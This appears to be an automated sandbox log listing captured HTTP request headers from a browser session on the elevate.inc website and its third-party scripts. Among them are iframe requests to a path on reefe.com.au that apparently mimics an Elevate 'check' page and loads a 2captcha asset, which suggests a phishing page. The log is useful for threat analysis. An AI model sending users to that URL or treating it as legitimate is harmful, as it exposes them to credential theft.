          Source: global trafficHTTP traffic detected: GET /component-parts HTTP/1.1host: www.elevate.incsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7purpose: prefetchsec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: emptyreferer: https://www.elevate.inc/our-storyaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=4, i
          Source: global trafficHTTP traffic detected: GET /login HTTP/1.1host: user.elevateaccounts.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7purpose: prefetchsec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: emptysec-fetch-storage-access: activereferer: https://www.elevate.inc/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=4, i
          Source: global trafficHTTP traffic detected: GET /why-elevate HTTP/1.1host: www.elevate.incsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7purpose: prefetchsec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: emptyreferer: https://www.elevate.inc/our-storyaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=4, i
          Source: global trafficHTTP traffic detected: GET /turnstile/v0/api.js HTTP/1.1host: challenges.cloudflare.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: scriptsec-fetch-storage-access: activereferer: https://www.elevate.inc/accept-encoding: identityaccept-language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /6537d1496ae55969d9298a91/658c475399e5cbfecce1c499_elevate%20-%20logo%20white.webp HTTP/1.1host: cdn.prod.website-files.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
          Source: global trafficHTTP traffic detected: GET /use-cases/health-plans HTTP/1.1host: www.elevate.incsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7purpose: prefetchsec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: emptyreferer: https://www.elevate.inc/our-storyaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=4, i
          Source: global trafficHTTP traffic detected: GET /js/optimize.js?key=w6GQ23b4dMgP1RzEeKpkDq HTTP/1.1host: cdn.mida.sosec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: scriptsec-fetch-storage-access: activereferer: https://www.elevate.inc/accept-encoding: identityaccept-language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /turnstile/v0/g/91b8d9bf2593/api.js HTTP/1.1host: challenges.cloudflare.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: scriptsec-fetch-storage-access: activereferer: https://www.elevate.inc/accept-encoding: identityaccept-language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /use-cases/third-party-administrators HTTP/1.1host: www.elevate.incsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7purpose: prefetchsec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: emptyreferer: https://www.elevate.inc/our-storyaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=4, i
          Source: global trafficHTTP traffic detected: GET /resource-center HTTP/1.1host: www.elevate.incsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7purpose: prefetchsec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: emptyreferer: https://www.elevate.inc/our-storyaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=4, i
          Source: global trafficHTTP traffic detected: GET /ab/elevateinc/check/index.html HTTP/1.1Host: reefe.com.auConnection: keep-alivesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeSec-Fetch-Storage-Access: activeReferer: https://www.elevate.inc/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /fb.js HTTP/1.1host: js.hsadspixel.netsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: scriptsec-fetch-storage-access: activereferer: https://www.elevate.inc/accept-encoding: identityaccept-language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /collectedforms.js HTTP/1.1host: js.hscollectedforms.netorigin: https://www.elevate.incsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*sec-fetch-site: cross-sitesec-fetch-mode: corssec-fetch-dest: scriptreferer: https://www.elevate.inc/accept-encoding: identityaccept-language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /v2/19524073/banner.js HTTP/1.1host: js.hs-banner.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: scriptsec-fetch-storage-access: activereferer: https://www.elevate.inc/accept-encoding: identityaccept-language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /analytics/1749241200000/19524073.js HTTP/1.1host: js.hs-analytics.netsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: scriptsec-fetch-storage-access: activereferer: https://www.elevate.inc/accept-encoding: identityaccept-language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /blog HTTP/1.1host: www.elevate.incsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7purpose: prefetchsec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: emptyreferer: https://www.elevate.inc/our-storyaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=4, i
          Source: global trafficHTTP traffic detected: GET /use-cases/peo-software HTTP/1.1host: www.elevate.incsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7purpose: prefetchsec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: emptyreferer: https://www.elevate.inc/our-storyaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=4, i
          Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/tdngb/0x4AAAAAAAQTptj2So4dx43e/auto/fbE/new/normal/auto/ HTTP/1.1host: challenges.cloudflare.comsec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"upgrade-insecure-requests: 1user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7sec-fetch-site: cross-sitesec-fetch-mode: navigatesec-fetch-dest: iframesec-fetch-storage-access: activereferer: https://www.elevate.inc/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=0, i
          Source: global trafficHTTP traffic detected: GET /use-cases/financial-institutions HTTP/1.1host: www.elevate.incsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7purpose: prefetchsec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: emptyreferer: https://www.elevate.inc/our-storyaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=4, i
          Source: global trafficHTTP traffic detected: GET /video/901646435?app_id=122963&referrer=https%3A%2F%2Fwww.elevate.inc%2F HTTP/1.1Host: player.vimeo.comConnection: keep-alivesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeSec-Fetch-Storage-Access: activeReferer: https://cdn.embedly.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /collected-forms/v1/config/json?portalId=19524073&utk= HTTP/1.1host: forms.hscollectedforms.netsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: application/json, text/plain, */*sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0origin: https://www.elevate.incsec-fetch-site: cross-sitesec-fetch-mode: corssec-fetch-dest: emptyreferer: https://www.elevate.inc/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
          Source: global trafficHTTP traffic detected: GET /ab/elevateinc/check/images/all.min.css HTTP/1.1Host: reefe.com.auConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleSec-Fetch-Storage-Access: activeReferer: https://reefe.com.au/ab/elevateinc/check/index.htmlAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1host: www.elevate.incsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7purpose: prefetchsec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: emptyreferer: https://www.elevate.inc/our-storyaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=4, i
          Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/cmg/1 HTTP/1.1host: challenges.cloudflare.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagesec-fetch-storage-access: activereferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/tdngb/0x4AAAAAAAQTptj2So4dx43e/auto/fbE/new/normal/auto/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: i
          Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=94baa202eb60f0c1&lang=auto HTTP/1.1host: challenges.cloudflare.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptsec-fetch-storage-access: activereferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/tdngb/0x4AAAAAAAQTptj2So4dx43e/auto/fbE/new/normal/auto/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1
          Source: global trafficHTTP traffic detected: GET /request-a-demo HTTP/1.1host: www.elevate.incsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7purpose: prefetchsec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: emptyreferer: https://www.elevate.inc/our-storyaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=4, i
          Source: global trafficHTTP traffic detected: GET /js/mida-integration.js?v=1.1.50 HTTP/1.1host: cdn.mida.sosec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: scriptsec-fetch-storage-access: activereferer: https://www.elevate.inc/accept-encoding: identityaccept-language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /li.lms-analytics/insight.min.js HTTP/1.1host: snap.licdn.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: scriptsec-fetch-storage-access: activereferer: https://www.elevate.inc/accept-encoding: identityaccept-language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /tag/qcbwstkzrz?ref=gtm2 HTTP/1.1host: www.clarity.mssec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: scriptsec-fetch-storage-access: activereferer: https://www.elevate.inc/accept-encoding: identityaccept-language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /hs-script-loader-public/v1/config/pixels-and-events/json?portalId=19524073 HTTP/1.1host: api.hubapi.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*origin: https://www.elevate.incsec-fetch-site: cross-sitesec-fetch-mode: corssec-fetch-dest: emptyreferer: https://www.elevate.inc/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
          Source: global trafficHTTP traffic detected: GET /js/mida-event.js?v=1.1.50 HTTP/1.1host: cdn.mida.sosec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: scriptsec-fetch-storage-access: activereferer: https://www.elevate.inc/accept-encoding: identityaccept-language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /js/mida-goal.js?v=1.1.50 HTTP/1.1host: cdn.mida.sosec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: scriptsec-fetch-storage-access: activereferer: https://www.elevate.inc/accept-encoding: identityaccept-language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /turnstile/v0/api.js?onload=turnstileLoad HTTP/1.1host: challenges.cloudflare.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: scriptsec-fetch-storage-access: activereferer: https://player.vimeo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /dist/web/assets/google-privacy-policy-Cb0CGVRT.svg HTTP/1.1host: 2captcha.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: imagesec-fetch-storage-access: activereferer: https://reefe.com.au/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=2, i
          Source: global trafficHTTP traffic detected: GET /pagead/viewthroughconversion/11308007612/?random=1749241460901&cv=11&fst=1749241460901&bg=ffffff&guid=ON&async=1&gtm=45be5641v9177334436z89174023338za200zb9174023338&gcd=13l3l3l3l1l1&dma=0&tag_exp=101509157~103116026~103200004~103233427~103351869~103351871~104653070~104653072~104661466~104661468~104667047~104698127~104698129&u_w=1280&u_h=1024&url=https%3A%2F%2Fwww.elevate.inc%2Four-story&label=GC8HCKaWkqIZELyBipAq&hn=www.googleadservices.com&frm=0&tiba=Trailblazing%20a%20better%20future%20for%20benefits%20%7C%20Our%20Story&npa=0&pscdl=noapi&auid=1555450382.1749241461&uaa=x86&uab=64&uafvl=Chromium%3B134.0.6998.36%7CNot%253AA-Brand%3B24.0.0.0%7CGoogle%2520Chrome%3B134.0.6998.36&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&_tu=Cg&rfmt=3&fmt=4 HTTP/1.1host: googleads.g.doubleclick.netsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*x-client-data: CLf3ygE=sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: scriptsec-fetch-storage-access: activereferer: https://www.elevate.inc/accept-encoding: identityaccept-language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /td/rul/11308007612?random=1749241460901&cv=11&fst=1749241460901&fmt=3&bg=ffffff&guid=ON&async=1&gtm=45be5641v9177334436z89174023338za200zb9174023338&gcd=13l3l3l3l1l1&dma=0&tag_exp=101509157~103116026~103200004~103233427~103351869~103351871~104653070~104653072~104661466~104661468~104667047~104698127~104698129&u_w=1280&u_h=1024&url=https%3A%2F%2Fwww.elevate.inc%2Four-story&label=GC8HCKaWkqIZELyBipAq&hn=www.googleadservices.com&frm=0&tiba=Trailblazing%20a%20better%20future%20for%20benefits%20%7C%20Our%20Story&npa=0&pscdl=noapi&auid=1555450382.1749241461&uaa=x86&uab=64&uafvl=Chromium%3B134.0.6998.36%7CNot%253AA-Brand%3B24.0.0.0%7CGoogle%2520Chrome%3B134.0.6998.36&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&_tu=Cg HTTP/1.1host: td.doubleclick.netsec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"upgrade-insecure-requests: 1user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7x-browser-channel: stablex-browser-year: 2025x-browser-validation: wTKGXmLo+sPWz1JKKbFzUyHly1Q=x-browser-copyright: Copyright 2025 Google LLC. All rights reserved.x-client-data: CLf3ygE=sec-fetch-site: cross-sitesec-fetch-mode: navigatesec-fetch-de
          Source: global trafficHTTP traffic detected: GET /press HTTP/1.1host: www.elevate.incsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7purpose: prefetchsec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: emptyreferer: https://www.elevate.inc/our-storyaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=4, i
          Source: global trafficHTTP traffic detected: GET /our-story HTTP/1.1host: www.elevate.incsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7purpose: prefetchsec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: emptyreferer: https://www.elevate.inc/our-storyaccept-encoding: identityaccept-language: en-US,en;q=0.9if-modified-since: Thu, 05 Jun 2025 21:46:58 GMTpriority: u=4, i
          Source: global trafficHTTP traffic detected: GET /turnstile/v0/g/91b8d9bf2593/api.js HTTP/1.1host: challenges.cloudflare.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: scriptsec-fetch-storage-access: activereferer: https://player.vimeo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9
